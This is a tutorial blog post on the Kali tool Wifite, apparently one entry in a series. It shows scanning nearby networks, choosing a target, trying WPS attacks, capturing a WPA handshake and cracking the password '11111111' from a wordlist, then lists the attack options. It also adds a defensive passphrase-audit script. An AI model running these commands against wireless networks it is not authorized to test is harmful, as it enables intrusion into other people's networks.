2021 iThome Ironman Challenge

Kali Linux Tool Notes series, part 27

Day 27 Wireless Attacks (Wifite)

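Today's tool is Wifite. It advertises that one simple command, with no tedious steps or extra parameters, is enough to scan for Wi-Fi networks and crack their passwords automatically, and it supports the WEP, WPA and WPS standards. Without further ado, let's try it out.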

Wifite is in Kali's 06-Wireless Attacks category. Running it directly shows how it is used:

sudo wifite

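The output can be read as several blocks. The first shows basic information about the tool, including the version and author, and then lists any recommended packages that are not installed: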

   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.5.2
 :  :  :  (¯)  :  :  :  a wireless auditor by @derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
 [!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
 [!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
 [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
 [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
 [!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger

The next block shows that the interface has entered monitor mode, which is why the NetworkManager process was ended:

 [!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill
 [+] Using wlp2s0mon already in monitor mode 

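Next comes the scanning phase. You can press Ctrl + C partway through to stop the scan, and Wifite then asks which target to use. Here I entered 3, the one named Treekey: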

   NUM                      ESSID   CH  ENCR   POWER  WPS?  CLIENT                               
   ---  -------------------------  ---  -----  -----  ----  ------
     1                  ken-2.4G     1  WPA-P   43db    no                                       
     2                 cheng1230     6  WPA-P   43db    no                                       
     3                   Treekey    13  WPA-P   22db  lock    1                                 
     4                     LIANG    11  WPA-P   22db    no                                       
     5                  chandler     6  WPA-P   22db    no                                       
     6                 ASUS 2.4G     6  WPA-P   17db  lock                                       
     7                     dong4     1  WPA-P   16db   yes                                       
     8          huangfamily-2.4G     1  WPA-P   16db   yes                                                                                                                                       
 [+] select target(s) (1-16) separated by commas, dashes or all: 3      

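What follows is a series of cracking attempts. At the end Wifite produces a .cap file and cracked.txt, and you can see that the password 11111111 was cracked: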

[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked               
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked                 
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked                 
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA             
[+] Treekey (45db) WPA Handshake capture: Captured handshake                                   
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)               
[+] Cracked WPA Handshake PSK: 11111111

[+]   Access Point Name: Treekey
[+]  Access Point BSSID: AA:AA:AA:AA:AA:AA
[+]          Encryption: WPA
[+]      Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+]      PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
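
The run above recovered the passphrase 11111111 from the default wordlist almost immediately. As an added example (not part of the original post and not Wifite code), the Python check below lets an administrator test their own WPA passphrase for the same weaknesses. The function names, the sample wordlist and the reading of "1898.7kps" as keys per second are assumptions of this example.

```python
import string

# Rate shown in the aircrack-ng run on this page ("1898.7kps"), read here
# as keys per second; that reading is an assumption of this example.
PAGE_RATE_KPS = 1898.7

def repeated_unit(s):
    """Return the shortest unit that s is built from by repetition, or None."""
    for size in range(1, len(s) // 2 + 1):
        if len(s) % size == 0 and s[:size] * (len(s) // size) == s:
            return s[:size]
    return None

def is_sequence(s):
    """True when every character steps by +1 or by -1 from the previous one."""
    steps = {ord(b) - ord(a) for a, b in zip(s, s[1:])}
    return steps in ({1}, {-1})

def charset_size(s):
    """Size of the smallest set of standard character pools that covers s."""
    pools = (string.digits, string.ascii_lowercase,
             string.ascii_uppercase, string.punctuation + " ")
    return sum(len(p) for p in pools if any(c in p for c in s))

def audit_psk(psk, wordlist=()):
    """Return a list of findings for a WPA/WPA2 passphrase; empty means none."""
    findings = []
    if not 8 <= len(psk) <= 63 or any(not 32 <= ord(c) <= 126 for c in psk):
        findings.append("not a valid passphrase (8-63 printable ASCII)")
    unit = repeated_unit(psk)
    if unit is not None:
        findings.append(f"repeats the unit {unit!r}")
    if is_sequence(psk):
        findings.append("simple ascending or descending sequence")
    if psk.isdigit():
        findings.append("digits only")
    if psk.lower() in {w.lower() for w in wordlist}:
        findings.append("present in the supplied wordlist")
    return findings

def exhaustive_hours(psk, rate=PAGE_RATE_KPS):
    """Hours to try every string of the same length and character pools."""
    return charset_size(psk) ** len(psk) / rate / 3600

if __name__ == "__main__":
    sample_wordlist = ["password", "11111111", "12345678"]  # constructed sample
    for candidate in ("11111111", "12345678", "maple-Otter7-quiet-Lamp"):
        print(candidate, audit_psk(candidate, sample_wordlist),
              f"{exhaustive_hours(candidate):.3g} h")
```

An eight-digit passphrase falls to exhaustive search in well under a day at the rate shown above, even when it is not in any wordlist, so length and a mixed character set matter more than avoiding one particular list.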

That is the simplest way to use Wifite. For other usage, see wifite -h, for example the options that target a specific mode:

WEP:
  --wep                                      Show only WEP-encrypted networks
  --require-fakeauth                         Fails attacks if fake-auth fails (default: off)
  --keep-ivs                                 Retain .IVS files and reuse when cracking (default: off)

WPA:
  --wpa                                      Show only WPA-encrypted networks (includes WPS)
  --new-hs                                   Captures new handshakes, ignores existing handshakes in hs (default:
                                             off)
  --dict [file]                              File containing passwords for cracking (default: /usr/share/dict/wordlist-
                                             probable.txt)                                                                                                                                                                                   

WPS:
  --wps                                      Show only WPS-enabled networks
  --wps-only                                 Only use WPS PIN & Pixie-Dust attacks (default:
                                             off)
  --bully                                    Use bully program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --reaver                                   Use reaver program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --ignore-locks                             Do not stop WPS PIN attack if AP becomes locked (default:
                                             stop)

